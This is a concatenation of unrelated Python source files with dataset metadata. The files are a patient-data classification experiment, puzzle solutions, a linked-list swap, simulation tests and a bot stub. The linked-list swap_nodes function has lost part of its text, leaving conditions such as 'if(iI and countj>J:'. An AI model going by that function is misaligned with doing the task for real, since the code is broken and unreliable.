weights='distance')\n# results_knn2 = prediction(clf_knn2, X_train, y_train, X_test, y_test)\n#\n# clf_ada = AdaBoostClassifier(n_estimators=100)\n# results_ada = prediction(clf_ada, X_train, y_train, X_test, y_test)\n#\n# clf_svm1 = SVC(kernel='linear')\n# results_svm1 = prediction(clf_svm1, X_train, y_train, X_test, y_test)\n#\n# clf_svm2 = SVC(kernel='rbf')\n# results_svm2 = prediction(clf_svm2, X_train, y_train, X_test, y_test)\n\n # print the classification performance\n print('Logistic Regression Classification Results - %s:' % s)\n print(results_lr[0])\n \n# print('Linear SVM Classification Results - %s:' % s)\n# print(results_svm1)\n#\n# print('RBF-SVM Classification Results - %s:' % s)\n# print(results_svm2)\n#\n# print('Random Forest Classification Results - %s:' % s)\n# print(results_rf)\n#\n# print('KNN (majority voting) Classification Results - %s:' % s)\n# print(results_knn1)\n#\n# print('KNN (weighted distance) Classification Results - %s:' % s)\n# print(results_knn2)\n#\n# print('AdaBoost Classification Results - %s:' % s)\n# print(results_ada)\n# \n# print('Multinomial Naive Bayes Classification Results - %s:' % s)\n# print(results_nb)\n#\n# print('LDA Classification Results - %s:' % s)\n# 
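The `otherMetrics` function above derives accuracy, precision, recall, and F1 for both classes from a 2x2 confusion matrix. A self-contained check of the same arithmetic on a toy matrix (the matrix values are hypothetical, chosen only to make the numbers easy to verify):

```python
import numpy as np

# toy 2x2 confusion matrix: rows = true class, cols = predicted class
mat = np.array([[40, 10],
                [5, 45]])
TP, FN, FP, TN = mat[0, 0], mat[0, 1], mat[1, 0], mat[1, 1]
acc = (TP + TN) / mat.sum()                         # 85/100 = 0.85
precision = TP / (TP + FP)                          # 40/45 ~ 0.889
recall = TP / (TP + FN)                             # 40/50 = 0.800
f1 = 2 * precision * recall / (precision + recall)  # ~0.842
print(acc, precision, recall, f1)
```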
print(results_lda)\n\n# return results_lr, results_svm1, results_svm2, results_rf, results_knn1, results_knn2, results_ada, results_lda, results_nb\n return np.array(results_lr[1])\n \n\ndef selectCols(data1, data2):\n data_both = pd.concat([data1, data2], axis=0, ignore_index=True)\n col_nonzeros = data_both.astype(bool).sum(axis=0)\n col_nonzeros2 = col_nonzeros.to_dict()\n cols = []\n for k, v in col_nonzeros2.items():\n if v > 0 and k != 'response':\n cols.append(k)\n return cols\n\n\ndef statTesting(data1, data2, cols):\n test_results = {}\n for i in cols:\n test = stats.ttest_ind(data1[i], data2[i], equal_var=False)\n if test[1] > 0:\n test_results[i] = test[1]\n results_rank = sorted(test_results.items(), key=operator.itemgetter(1))\n return results_rank\n\n\ndef statTesting_allgroups(chf, dm, ckd, copd):\n cols = {}\n cols['chf_vs_dm'] = selectCols(chf, dm)\n cols['chf_vs_ckd'] = selectCols(chf, ckd)\n cols['chf_vs_copd'] = selectCols(chf, copd)\n cols['dm_vs_ckd'] = selectCols(dm, ckd)\n cols['dm_vs_copd'] = selectCols(dm, copd)\n cols['ckd_vs_copd'] = selectCols(ckd, copd)\n\n results = {}\n results['chf_vs_dm'] = statTesting(chf, dm, cols['chf_vs_dm'])\n results['chf_vs_ckd'] = statTesting(chf, ckd, cols['chf_vs_ckd'])\n results['chf_vs_copd']= statTesting(chf, copd, cols['chf_vs_copd'])\n results['dm_vs_ckd'] = statTesting(dm, ckd, cols['dm_vs_ckd'])\n results['dm_vs_copd'] = statTesting(dm, copd, cols['dm_vs_copd'])\n results['ckd_vs_copd'] = statTesting(ckd, copd, cols['ckd_vs_copd'])\n return results, cols\n\n\ndef statTesting_sampleOnce(data1, data2, col, size, r, thres):\n sample1 = data1.sample(n=size, replace=False, random_state=r)\n sample2 = data2.sample(n=size, replace=False, random_state=r)\n results = statTesting(sample1, sample2, col)\n results_new = significant_items_one([], results, thres)\n return results, results_new\n\n \ndef statTesting_sampleMultiple(data1, data2, col, thres):\n all_sizes = [100, 200, 300, 500, 800]\n results = {}\n for i in range(len(all_sizes)):\n results[all_sizes[i]] = []\n for j in range(1, 11):\n if all_sizes[i] <= min(len(data1), len(data2)):\n res = statTesting_sampleOnce(data1, data2, col, all_sizes[i], j, thres)\n results[all_sizes[i]].append(res)\n return results\n\n\ndef significant_items_one(res, value, thres):\n for k, v in value:\n if v <= thres:\n res.append(k)\n return res\n \n\ndef distinctItems(results, thres, s0='_medproc_'):\n results_new = dict.fromkeys(results.keys())\n# results_ranks = dict.fromkeys(results.keys())\n for key, value in results.items():\n results_new[key] = []\n significant_items_one(results_new[key], value, thres)\n# results_rank0 = sorted(value, key=operator.itemgetter(1))\n# results_ranks[key] = results_rank0\n df = pd.Series(results_new[key])\n df.to_csv(key + s0 + 'selected_items_ttest.csv', header=False, index=False)\n return results_new\n\n\ndef sample_ttest_experiments_all(chf, dm, ckd, copd, selected_cols, thres):\n sample_results = {}\n rs_chf_dm = statTesting_sampleMultiple(chf, dm, selected_cols['chf_vs_dm'], thres)\n rs_chf_ckd = statTesting_sampleMultiple(chf, ckd, selected_cols['chf_vs_ckd'], thres)\n rs_chf_copd = statTesting_sampleMultiple(chf, copd, selected_cols['chf_vs_copd'], thres)\n rs_dm_ckd = statTesting_sampleMultiple(dm, ckd, selected_cols['dm_vs_ckd'], thres)\n rs_dm_copd = statTesting_sampleMultiple(dm, copd, selected_cols['dm_vs_copd'], thres)\n rs_ckd_copd = statTesting_sampleMultiple(ckd, copd, selected_cols['ckd_vs_copd'], thres)\n sample_results['chf_vs_dm'] = 
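The `statTesting` helper above ranks columns by the p-value of Welch's t-test (`equal_var=False`). A minimal standalone sketch of that selection step, assuming two `pandas.DataFrame`s sharing the candidate columns (the function and argument names here are hypothetical):

```python
import pandas as pd
from scipy import stats

def select_features(df_a: pd.DataFrame, df_b: pd.DataFrame, cols, alpha=0.05):
    """Columns whose Welch t-test p-value is <= alpha, most significant first."""
    pvals = {c: stats.ttest_ind(df_a[c], df_b[c], equal_var=False)[1] for c in cols}
    return sorted((c for c, p in pvals.items() if p <= alpha), key=pvals.get)
```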
rs_chf_dm\n sample_results['chf_vs_ckd'] = rs_chf_ckd\n sample_results['chf_vs_copd'] = rs_chf_copd\n sample_results['dm_vs_ckd'] = rs_dm_ckd\n sample_results['dm_vs_copd'] = rs_dm_copd\n sample_results['ckd_vs_copd'] = rs_ckd_copd\n return sample_results\n\n\ndef Classification_ttest_all(selected_cols, thres, size):\n sample_results = {}\n sample_results['chf_vs_dm'] = Classification_ttest(selected_cols['chf_vs_dm'], thres, size, 'chf', 'dm')\n sample_results['chf_vs_ckd'] = Classification_ttest(selected_cols['chf_vs_ckd'], thres, size, 'chf', 'ckd')\n sample_results['chf_vs_copd'] = Classification_ttest(selected_cols['chf_vs_copd'], thres, size, 'chf', 'copd')\n sample_results['dm_vs_ckd'] = Classification_ttest(selected_cols['dm_vs_ckd'], thres, size, 'dm', 'ckd')\n sample_results['dm_vs_copd'] = Classification_ttest(selected_cols['dm_vs_copd'], thres, size, 'dm', 'copd')\n sample_results['ckd_vs_copd'] = Classification_ttest(selected_cols['ckd_vs_copd'], thres, size, 'ckd', 'copd')\n return sample_results\n \n\ndef Classification_lasso_all(selected_cols, thres, size):\n sample_results = {}\n sample_results['chf_vs_dm'] = Classification_lasso(selected_cols['chf_vs_dm'], thres, size, 'chf', 'dm')\n sample_results['chf_vs_ckd'] = Classification_lasso(selected_cols['chf_vs_ckd'], thres, size, 'chf', 'ckd')\n sample_results['chf_vs_copd'] = Classification_lasso(selected_cols['chf_vs_copd'], thres, size, 'chf', 'copd')\n sample_results['dm_vs_ckd'] = Classification_lasso(selected_cols['dm_vs_ckd'], thres, size, 'dm', 'ckd')\n sample_results['dm_vs_copd'] = Classification_lasso(selected_cols['dm_vs_copd'], thres, size, 'dm', 'copd')\n sample_results['ckd_vs_copd'] = Classification_lasso(selected_cols['ckd_vs_copd'], thres, size, 'ckd', 'copd')\n return sample_results\n \n \ndef Fearture_ttest_sampleOnce(train1, train2, col, thres):\n results_feature = statTesting(train1, train2, col)\n selected_features = significant_items_one([], results_feature, thres)\n return selected_features\n \n \ndef Feature_classify_samplesOnce(train1, train2, test1, test2, selected_features, c): \n train, train_response, test, test_response = prepareClassificationData(train1, train2, test1, test2, selected_features)\n results_classification = prediction_experiments(train, train_response, test, test_response, 'RawData', c)\n return results_classification\n \n \ndef createTrainTest(data1, data2, selected_features):\n train1 = data1[selected_features] \n train2 = data2[selected_features]\n train = train1.append(train2)\n response = [1] * len(train1) + [2] * len(train2)\n return train, response\n \n \ndef prepareClassificationData(train1, train2, test1, test2, selected_features):\n X_train, y_train = createTrainTest(train1, train2, selected_features)\n X_test, y_test = createTrainTest(test1, test2, selected_features)\n return X_train, y_train, X_test, y_test\n \n\ndef getSamples(data, r, s):\n train, test = train_test_split(data, test_size = size, random_state=r)\n train.to_csv(str(r) + '_' + s + '_train.csv', header=True, index=False)\n test.to_csv(str(r) + '_' + s + '_test.csv', header=True, index=False)\n\n \n \ndef getSamples_all(chf, dm, ckd, copd):\n for j in range(1, 11):\n getSamples(chf, j, 'chf')\n getSamples(dm, j, 'dm')\n getSamples(ckd, j, 'ckd')\n getSamples(copd, j, 'copd') \n \n \ndef Classification_ttest(col, thres, size, s1, s2, c=1000000000000000000):\n all_features_ttest = []\n classification_all_ttest = []\n\n for j in range(1, 11):\n train1 = pd.read_csv(str(j) + '_' + s1 + '_train.csv', 
header=0)\n train2 = pd.read_csv(str(j) + '_' + s2 + '_train.csv', header=0)\n test1 = pd.read_csv(str(j) + '_' + s1 + '_test.csv', header=0)\n test2 = pd.read_csv(str(j) + '_' + s2 + '_test.csv', header=0)\n # t test to select features\n selected_features_ttest = Fearture_ttest_sampleOnce(train1, train2, col, thres) \n classifications_ttest = Feature_classify_samplesOnce(train1, train2, test1, test2, selected_features_ttest, c)\n all_features_ttest += selected_features_ttest\n classification_all_ttest.append(classifications_ttest)\n \n # ttest-based results summary\n feature_counts_ttest = collections.Counter(all_features_ttest)\n features_rank_ttest = sorted(dict(feature_counts_ttest).items(), key=operator.itemgetter(1), reverse=True)\n# feature_rank = feature_counts.most_common(10)\n classification_ttest_avg, classification_ttest_std = calcAvgStd(classification_all_ttest)\n \n return features_rank_ttest, classification_ttest_avg, classification_ttest_std\n \n\n#features_lasso['ckd_vs_copd'] = [\"XR.CHEST.SINGLE.VW\", \"Antiasthmatic\", \"MUMPS..IGG\", \"CT.SHOULDER.RIGHT..RADIOLOGIST.TO.RECOMMEND.CONTRAST.\"]\ndef Classification_lasso(col, thres, size, s1, s2, c=1.0):\n# all_features_lasso = []\n classification_all_lasso = []\n for j in range(1, 11):\n train1 = pd.read_csv(str(j) + '_' + s1 + '_train.csv', header=0)\n train2 = pd.read_csv(str(j) + '_' + s2 + '_train.csv', header=0)\n test1 = pd.read_csv(str(j) + '_' + s1 + '_test.csv', header=0)\n test2 = pd.read_csv(str(j) + '_' + s2 + '_test.csv', header=0)\n \n # classification based on the LASSO features\n# all_features_lasso += features_lasso[j-1]\n classifications_lasso = Feature_classify_samplesOnce(train1, train2, test1, test2, col, c) \n classification_all_lasso.append(classifications_lasso)\n \n# feature_counts_lasso = collections.Counter(all_features_lasso)\n# features_rank_lasso = sorted(dict(feature_counts_lasso).items(), key=operator.itemgetter(1), reverse=True)\n# feature_rank = feature_counts.most_common(10)\n classification_lasso_avg, classification_lasso_std = calcAvgStd(classification_all_lasso)\n \n return classification_lasso_avg, classification_lasso_std, #features_rank_lasso\n\n \n \ndef calcAvgStd(data):\n data_sum = np.zeros(len(data[0]))\n for d in data:\n data_sum += d\n avgs = data_sum / len(data)\n \n data_std = []\n for i in range(len(data[0])):\n data_aggr = []\n for j in range(len(data)):\n data_aggr.append(data[j][i])\n stDev = np.std(data_aggr)\n data_std.append(stDev)\n return avgs, data_std\n \n\ndef resultCompare(results1, results2, ind1=0, ind2=1):\n comparison = {} \n comparison_res = []\n for key, value in results1.items():\n comparison[key] = {}\n avgs1 = value[ind1]\n stds1 = value[ind1 + 1]\n avgs2 = results2[key][ind2]\n stds2 = results2[key][ind2 + 1]\n comparison[key]['Avg'] = np.array(avgs1) - np.array(avgs2)\n comparison[key]['Std'] = np.array(stds1) - np.array(stds2)\n comparison_res.append(comparison[key]['Avg'])\n comparison_df = pd.DataFrame(comparison_res, columns=['Acc', 'Prec1', 'Recall1', 'F1score1', 'Prec2', 'Recall2', 'F1score2'])\n comparison_df.index = results1.keys() \n return comparison, comparison_df\n \n \ndef writetocsv(data, filename):\n f = open(filename, 'w', newline='\\n', encoding='utf8')\n mywriter = csv.writer(f)\n for i in data:\n mywriter.writerow(i)\n f.close()\n print('Finish writing to csv!')\n \nif __name__ == '__main__':\n # load the patient matrix data\n with open('Pts_data_matrices.pickle', 'rb') as f:\n pts_meds_dict, pts_procs_dict, pts_matrix, 
pts_matrix_response = pickle.load(f, encoding='utf-8')\n f.close()\n\n # 94 patients\n with open('all_meds.pickle', 'rb') as f:\n all_meds = pickle.load(f, encoding='utf-8')\n f.close()\n\n # 5,907patients\n with open('all_procs.pickle', 'rb') as f:\n all_procs = pickle.load(f, encoding='utf-8')\n f.close()\n\n data = np.array(pts_matrix)\n response = np.array(pts_matrix_response)\n d_names = colNames(all_meds, all_procs)\n # make the key, value into value, key in d_names\n d_names_inds = {}\n for k, v in d_names.items():\n d_names_inds[v] = k\n \n with open('all_proc_cats_dict.pickle', 'rb') as f1:\n proc_cats_all = pickle.load(f1)\n \n proc_cat_inds = dict.fromkeys(proc_cats_all)\n for key, value in proc_cats_all.items():\n proc_cat_inds[key] = []\n s0 = ''\n for v in value:\n s0 += str(d_names_inds[v]) + '%#%'\n proc_cat_inds[key] = s0 \n proc_cat_list = list(proc_cat_inds.values())\n proc_cat_list_df = pd.Series(proc_cat_list)\n proc_cat_list_df.to_csv('proc_categories.csv', header=False, index=False) \n \n \n #==================================Experiemnt 1: hypothesis testing=================================================\n\n pts_matrix_df = pd.DataFrame(pts_matrix, columns=d_names.values())\n pts_matrix_df['response'] = response\n\n pts_matrix_df.to_csv('pts_matrix_df.csv', header=True, index=False)\n pts_matrix_df = pd.read_csv('pts_matrix_df.csv', header=0)\n\n\n chf = pts_matrix_df[pts_matrix_df['response'] == 1]\n dm = pts_matrix_df[pts_matrix_df['response'] == 2]\n ckd = pts_matrix_df[pts_matrix_df['response'] == 3]\n copd = pts_matrix_df[pts_matrix_df['response'] == 4]\n \n \n test_results, selected_cols = statTesting_allgroups(chf, dm, ckd, copd)\n sig_items = distinctItems(test_results, 0.05)\n with open('ttest_results.pickle', 'wb') as f:\n pickle.dump([test_results, selected_cols, sig_items], f)\n\n samples_results = sample_ttest_experiments_all(chf, dm, ckd, copd, selected_cols, 0.05)\n with open('ttest_results_samples.pickle', 'wb') as f:\n pickle.dump(samples_results, f)\n \n # samples \n all_meds.add('response')\n chf_meds = chf[list(all_meds)]\n dm_meds = dm[list(all_meds)]\n ckd_meds = ckd[list(all_meds)]\n copd_meds = copd[list(all_meds)]\n \n test_results_meds, selected_cols_meds = statTesting_allgroups(chf_meds, dm_meds, ckd_meds, copd_meds)\n sig_items_meds = distinctItems(test_results_meds, 0.05, '_med_')\n with open('ttest_results_meds.pickle', 'wb') as f:\n pickle.dump([test_results_meds, selected_cols_meds, sig_items_meds], f)\n \n samples_results_meds = sample_ttest_experiments_all(chf_meds, dm_meds, ckd_meds, copd_meds, selected_cols_meds, 0.05)\n with open('ttest_results_samples_meds.pickle', 'wb') as f:\n pickle.dump(samples_results_meds, f)\n\n \n# ttest_items = dict.fromkeys(sig_items)\n# for key, value in sig_items.items():\n# print(key)\n# s0 = ''\n# for v in value:\n# s0 += str(d_names_inds[v]) + '%#%'\n# ttest_items[key] = s0\n# ttest_items_list = list(ttest_items.values())\n# ttest_items_df = pd.Series(ttest_items_list)\n# ttest_items_df.to_csv('ttest_items_inds.csv', header=False, index=False)\n \n # =========================Experiment 2: Classification ================================\n # Feature Selection (50% of data) using hypothesis testing ; then Classification using the selected features ==========================\n thres = 0.05\n size = 0.3 \n # generate all 10 sets of data samples for each subpopulation; write to csv\n getSamples_all(chf, dm, ckd, copd)\n \n \n classification_results_ttest = Classification_ttest_all(selected_cols, thres, 
size)\n for k, v in classification_results_ttest.items():\n print(k + str(' - Avg: '))\n print(v[1])\n print(k + str(' - Std: '))\n print(v[2]) \n\n with open('classification_results_ttest.pickle', 'wb') as f:\n pickle.dump(classification_results_ttest, f)\n\n\n with open('all_proc_cats_dict.pickle', 'rb') as f1:\n proc_cats_all = pickle.load(f1)\n\n \n classification_results_lasso = Classification_lasso_all(selected_cols, thres, size) \n for k, v in classification_results_lasso.items():\n print(k + str(' - Avg: '))\n print(v[0])\n print(k + str(' - Std: '))\n print(v[1])\n \n with open('classification_results_lasso.pickle', 'wb') as f:\n pickle.dump(classification_results_lasso, f)\n \n selected_cols_lasso = dict.fromkeys(selected_cols)\n selected_cols_lasso['chf_vs_dm'] = selected_cols['chf_vs_dm']\n selected_cols_lasso['chf_vs_ckd'] = [\"BISPECTRAL MONITORING\"]\n selected_cols_lasso['chf_vs_copd'] = [\"Antiasthmatic\", \"Macrolide Antibiotics\", \"PULMONARY FUNCTION TESTS ADULT\", \"FLU FLUZONE 0.5ML VL 36MO>\", \"CTA ABDOMEN PELVIS (RADIOLOGIST TO RECOMMEND)\", \"PR EXC SKIN BENIG <5MM REMAINDR BODY\"]\n selected_cols_lasso['dm_vs_ckd'] = [\"Antidiabetic\", \"HEMOGLOBIN A1C\", \"XR CHEST SINGLE VW\", \"CARBOXYHEMOGLOBIN\", \"ANTI-NEUTROPHIL ANTIBODY\"]\n selected_cols_lasso['dm_vs_copd'] = [\"Antidiabetic\", \"Antiasthmatic\", \"HEMOGLOBIN A1C\", \"Macrolide Antibiotics\"]\n selected_cols_lasso['ckd_vs_copd'] = selected_cols['ckd_vs_copd']\n\n classification_results_lasso2 = Classification_lasso_all(selected_cols_lasso, thres, size) \n for k, v in classification_results_lasso2.items():\n print(k + str(' - Avg: '))\n print(v[0])\n print(k + str(' - Std: '))\n print(v[1])\n\n\n \n comparisons_dict, comparisons_df = resultCompare(classification_results_lasso, classification_results_ttest)\n comparisons_df.to_csv('comparison_avg_lasso_ttest.csv', header=True)\n \n # # data transformation using matrix factorization\n # data_spca, pca_components = feature_transform.SparsePCA_transformationV2(data, 50)\n # data_nmf, nmf_components = feature_transform.NMF_transformationV2(data, 50)\n #\n # # split training and testing sets; predictive modeling\n # # results_svm1, results_svm2, results_rf, results_knn1, results_knn2, results_ada = prediction_experiments(data, response, 'Raw Data')\n #\n # spca_results_svm1, spca_results_svm2, spca_results_rf, spca_results_knn1, spca_results_knn2, spca_results_ada = prediction_experiments(data_spca, response, 'SPCA-transformed data')\n #\n # nmf_results_svm1, nmf_results_svm2, nmf_results_rf, nmf_results_knn1, nmf_results_knn2, nmf_results_ada = prediction_experiments(data_nmf, response, 'NMF-transformed data')\n\n # In[204]: len(test_items['chf_vs_dm'])\n # Out[204]: 267\n # In[205]: len(test_items['chf_vs_ckd'])\n # Out[205]: 1030\n # In[206]: len(test_items['chf_vs_copd'])\n # Out[206]: 245\n # In[207]: len(test_items['dm_vs_ckd'])\n # Out[207]: 964\n # In[208]: len(test_items['dm_vs_copd'])\n # Out[208]: 129\n # In[209]: len(test_items['ckd_vs_copd'])\n # Out[209]: 922\n\n\n with open('ttest_results.pickle', 'rb') as f:\n test_results = pickle.load(f)\n\n with open('ttest_results_samples.pickle', 'rb') as f:\n samples_results = pickle.load(f)\n\n\n # with open('selected_features_ttest.pickle', 'wb') as f:\n # pickle.dump(test_items, f)\n #\n # with open('selected_features_ttest.pickle', 'rb') as f:\n # test_items = 
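The averages and standard deviations printed above come from `calcAvgStd`, which aggregates the per-run metric vectors with explicit loops. The same per-metric mean and standard deviation can be computed in one numpy call; a reasonable drop-in sketch, not the file's original implementation:

```python
import numpy as np

def calc_avg_std(rows):
    """rows: list of equal-length metric vectors (one per run)."""
    arr = np.asarray(rows, dtype=float)
    # np.std defaults to ddof=0, matching the loop-based version above
    return arr.mean(axis=0), arr.std(axis=0)
```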
pickle.load(f)\n\n","sub_path":"Classification_Experiments.py","file_name":"Classification_Experiments.py","file_ext":"py","file_size_in_byte":22657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"188831684","text":"import time\r\none_to_nin = [\"one\",\"two\",\"three\",\"four\",\"five\",\"six\",\"seven\",\"eight\",\"nine\",\"ten\",\r\n \"eleven\",\"twelve\",\"thirteen\",\"fourteen\",\"fifteen\",\"sixteen\",\"seventeen\",\r\n \"eighteen\",\"nineteen\"]\r\ntens = [\"twenty\",\"thirty\",\"forty\",\"fifty\",\"sixty\",\"seventy\",\"eighty\",\"ninety\"]\r\na = \"and\" ; h = \"hundred\"\r\n\r\ndef letters_of_num(i):\r\n ans = 0\r\n if (len(str(i)) == 2):\r\n un = int(i%10) ; dec = int(i/10)\r\n if (un == 0):\r\n ans = len(tens[dec-2])\r\n else:\r\n ans = (len(tens[dec-2]) + len(one_to_nin[un-1]))\r\n else:\r\n hun = int(i/100) ; res = int(i%100)\r\n if (res == 0):\r\n ans = (len(one_to_nin[hun-1]) + len(h))\r\n elif (res>=1) and (res<=19) :\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(one_to_nin[res-1]))\r\n else:\r\n dec = int(res/10) ; un = int(res%10)\r\n if(un != 0):\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(tens[dec-2]) + len(one_to_nin[un-1]))\r\n else:\r\n ans = (len(one_to_nin[hun-1]) + len(h) + len(a) + len(tens[dec-2]))\r\n return ans\r\n \r\nstart = time.time() ; N = 1000 ; ans = 0 \r\nans += sum([len(x) for x in one_to_nin])\r\nfor i in range(20,N):\r\n ans += letters_of_num(i)\r\nprint(ans+len('onethousand'),time.time()-start,\"seconds\")\r\n \r\n ","sub_path":"Pr17.py","file_name":"Pr17.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"355137923","text":"negative = \"Invalid Input\" \n\ndef lcm(l ,r):\n LCM = max([l,r])\n\n while 1:\n if LCM % l ==0 and LCM % r == 0:\n return LCM\n LCM +=1\n\ntry:\n l, r = list(map(int, input().split()))\n print(lcm(l,r))\nexcept:\n print(negative)\n","sub_path":"player/settwo/landr.py","file_name":"landr.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"121337062","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\ndef swap_nodes(head, i, j):\n counti=0\n countj=0\n curr=head\n prev=None\n if(iI and countj>J:\n break\n if counti==I:\n ihead=curr\n if(curr.next is not None):\n iheadnext=curr.next\n else:\n iheadnext=None\n iprev=prev\n if countj==J:\n jhead=curr\n if(jhead.next is not None):\n jheadnext=jhead.next\n else:\n jheadnext=None\n jprev=prev\n counti+=1\n countj+=1\n prev=curr\n curr=curr.next\n if ihead == jprev:\n if iprev is not None:\n iprev.next=jhead\n jhead.next=ihead\n ihead.next=jheadnext\n return head\n else:\n jhead.next=ihead\n ihead.next=jheadnext\n return jhead\n if iprev is None:\n jprev.next=ihead\n jhead.next=iheadnext\n ihead.next=jheadnext\n return jhead\n iprev.next=jhead\n jprev.next=ihead\n \n jhead.next=iheadnext\n ihead.next=jheadnext\n return head\n \n #############################\n # PLEASE ADD YOUR CODE HERE #\n #############################\n pass\n\ndef ll(arr):\n if len(arr)==0:\n return None\n head = Node(arr[0])\n last = head\n for data in arr[1:]:\n last.next = Node(data)\n last = last.next\n return head\n\ndef printll(head):\n while head:\n print(head.data, end=' ')\n head = head.next\n print()\n\n# Main\n# Read the link list 
elements including -1\narr=list(int(i) for i in input().strip().split(' '))\n# Create a Linked list after removing -1 from list\nl = ll(arr[:-1])\ni, j=list(int(i) for i in input().strip().split(' '))\nl = swap_nodes(l, i, j)\nprintll(l)\n\n","sub_path":"Linked List -2/swap two node (LL) .py","file_name":"swap two node (LL) .py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"530177007","text":"import os.path as op\n\nfrom numpy import loadtxt\nfrom numpy.testing import assert_array_equal, assert_allclose, assert_raises\n\nfrom mne.utils import _fetch_file\nimport hnn_core\nfrom hnn_core import simulate_dipole, Network, read_params\nfrom hnn_core import MPIBackend, JoblibBackend\n\n\ndef run_hnn_core(backend=None, n_jobs=1):\n \"\"\"Test to check if hnn-core does not break.\"\"\"\n # small snippet of data on data branch for now. To be deleted\n # later. Data branch should have only commit so it does not\n # pollute the history.\n data_url = ('https://raw.githubusercontent.com/jonescompneurolab/'\n 'hnn-core/test_data/dpl.txt')\n if not op.exists('dpl.txt'):\n _fetch_file(data_url, 'dpl.txt')\n dpl_master = loadtxt('dpl.txt')\n\n hnn_core_root = op.dirname(hnn_core.__file__)\n\n # default params\n params_fname = op.join(hnn_core_root, 'param', 'default.json')\n params = read_params(params_fname)\n params_reduced = params.copy()\n params_reduced.update({'N_pyr_x': 3,\n 'N_pyr_y': 3,\n 'tstop': 25,\n 't_evprox_1': 5,\n 't_evdist_1': 10,\n 't_evprox_2': 20,\n 'N_trials': 2})\n\n # run the simulation on full model (1 trial) and a reduced model (2 trials)\n net = Network(params)\n net_reduced = Network(params_reduced)\n\n if backend == 'mpi':\n with MPIBackend(n_procs=2, mpi_cmd='mpiexec'):\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n elif backend == 'joblib':\n with JoblibBackend(n_jobs=n_jobs):\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n else:\n dpl = simulate_dipole(net)[0]\n dpls_reduced = simulate_dipole(net_reduced)\n\n # write the dipole to a file and compare\n fname = './dpl2.txt'\n dpl.write(fname)\n\n dpl_pr = loadtxt(fname)\n assert_array_equal(dpl_pr[:, 2], dpl_master[:, 2]) # L2\n assert_array_equal(dpl_pr[:, 3], dpl_master[:, 3]) # L5\n\n # Test spike type counts\n spiketype_counts = {}\n for spikegid in net.spikes.gids[0]:\n if net.gid_to_type(spikegid) not in spiketype_counts:\n spiketype_counts[net.gid_to_type(spikegid)] = 0\n else:\n spiketype_counts[net.gid_to_type(spikegid)] += 1\n assert 'common' not in spiketype_counts\n assert 'exgauss' not in spiketype_counts\n assert 'extpois' not in spiketype_counts\n assert spiketype_counts == {'evprox1': 269,\n 'L2_basket': 54,\n 'L2_pyramidal': 113,\n 'L5_pyramidal': 395,\n 'L5_basket': 85,\n 'evdist1': 234,\n 'evprox2': 269}\n return dpls_reduced\n\n\ndef test_compare_across_backends():\n \"\"\"Test that trials are generated consistently across parallel backends.\"\"\"\n\n # test consistency between default backend simulation and master\n dpls_reduced_default = run_hnn_core(None)\n\n # test consistency between mpi backend simulation (n_procs=2) and master\n dpls_reduced_mpi = run_hnn_core(backend='mpi')\n\n # test consistency between joblib backend simulation (n_jobs=2) with master\n dpls_reduced_joblib = run_hnn_core(backend='joblib', n_jobs=2)\n\n # test consistency across all parallel backends for multiple trials\n assert_raises(AssertionError, 
assert_array_equal,\n dpls_reduced_default[0].data['agg'],\n dpls_reduced_default[1].data['agg'])\n\n for trial_idx in range(len(dpls_reduced_default)):\n # account for rounding error incured during MPI parallelization\n assert_allclose(dpls_reduced_default[trial_idx].data['agg'],\n dpls_reduced_mpi[trial_idx].data['agg'], rtol=0,\n atol=1e-14)\n assert_array_equal(dpls_reduced_default[trial_idx].data['agg'],\n dpls_reduced_joblib[trial_idx].data['agg'])\n","sub_path":"hnn_core/tests/test_compare_hnn.py","file_name":"test_compare_hnn.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8661604","text":"'''\n The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\n Find the sum of all the primes not greater than given N.\n\n Input Format\n\n The first line contains an integer T i.e. number of the test cases. \n The next T lines will contains an integer N.\n\n Constraints\n\n 1 <= T <= 10^4\n 1 <= N <= 10^6\n\n Output Format\n\n Print the value corresponding to each test case in separate line.\n\n Algorithm 4: Here we use sieve of rwh1\n'''\n\nfrom timeit import default_timer as timer\n\ndef sumOfPrimes(number):\n sum = 2\n number = number + 1\n primes = [True] * (number // 2)\n limit = int(number ** 0.5) + 1\n\n for i in range(3, limit, 2):\n if primes[i//2]:\n primes[i*i//2::i] = [False]*((number - i*i - 1)//(2*i) + 1)\n \n for i in range(1, number // 2):\n if primes[i]:\n sum += (2 * i + 1)\n\n return sum\n\nif __name__ == '__main__':\n number = int(input('Enter then number :: '))\n start = timer()\n print('Sum of primes not greater than {} is {}'.format(number, sumOfPrimes(number)))\n end = timer()\n print('Time taken is : {}'.format(end - start))\n","sub_path":"general-practice/24_08_2019/p7.py","file_name":"p7.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"241758119","text":"'''\n\n'''\n\nimport json\nimport logging\nimport traceback\nimport asyncio\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Optional, List, Dict, Union\n\nimport asyncpg\nimport discord\nfrom discord.ext import commands\n\nimport db\n\n\n\nfrom bot import GGBot\n\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s\")\n\nbot = GGBot(command_prefix=\"t;\",\n max_messages=100000,\n # description=\"A simple logging bot that ignores PluralKit proxies.\\n\",\n owner_id=389590659335716867,\n case_insensitive=True)\n\n\n@bot.event\nasync def on_ready():\n logging.info('Connected using discord.py version 